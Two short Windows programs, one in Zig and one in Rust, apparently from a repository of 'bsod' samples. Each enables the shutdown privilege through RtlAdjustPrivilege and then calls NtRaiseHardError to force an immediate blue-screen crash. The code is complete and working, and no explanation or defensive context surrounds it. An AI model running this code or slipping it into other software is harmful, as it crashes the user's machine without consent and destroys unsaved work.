File: Windows/Zig/x32/bsod.zig
const std = @import("std");

const NTSTATUS = i32;
const BOOLEAN = u8;
const ULONG = u32;

extern "ntdll" fn RtlAdjustPrivilege(Privilege: ULONG, Enable: BOOLEAN, CurrentThread: BOOLEAN, Enabled: *BOOLEAN) callconv(.C) NTSTATUS;
extern "ntdll" fn NtRaiseHardError(ErrorStatus: ULONG, NumberOfParameters: ULONG, UnicodeStringParameterMask: ULONG, Parameters: ?*anyopaque, ValidResponseOptions: ULONG, Response: *ULONG) callconv(.C) NTSTATUS;

pub fn main() void {
    var enabled: BOOLEAN = 0;
    var response: ULONG = 0;
    
    _ = RtlAdjustPrivilege(19, 1, 0, &enabled);
    _ = NtRaiseHardError(0xC0000420, 0, 0, null, 6, &response);
}

File: Windows/Rust/x32/bsod.rs
#![windows_subsystem = "console"]

use std::ffi::c_void;

#[link(name = "ntdll")]
extern "system" {
    fn RtlAdjustPrivilege(Privilege: u32, Enable: u8, CurrentThread: u8, Enabled: *mut u8) -> i32;
    fn NtRaiseHardError(ErrorStatus: u32, NumberOfParameters: u32, UnicodeStringParameterMask: u32, Parameters: *mut c_void, ValidResponseOptions: u32, Response: *mut u32) -> i32;
}

fn main() {
    let mut enabled: u8 = 0;
    let mut response: u32 = 0;
    
    unsafe {
        RtlAdjustPrivilege(19, 1, 0, &mut enabled);
        NtRaiseHardError(0xC0000420, 0, 0, std::ptr::null_mut(), 6, &mut response);
    }
}

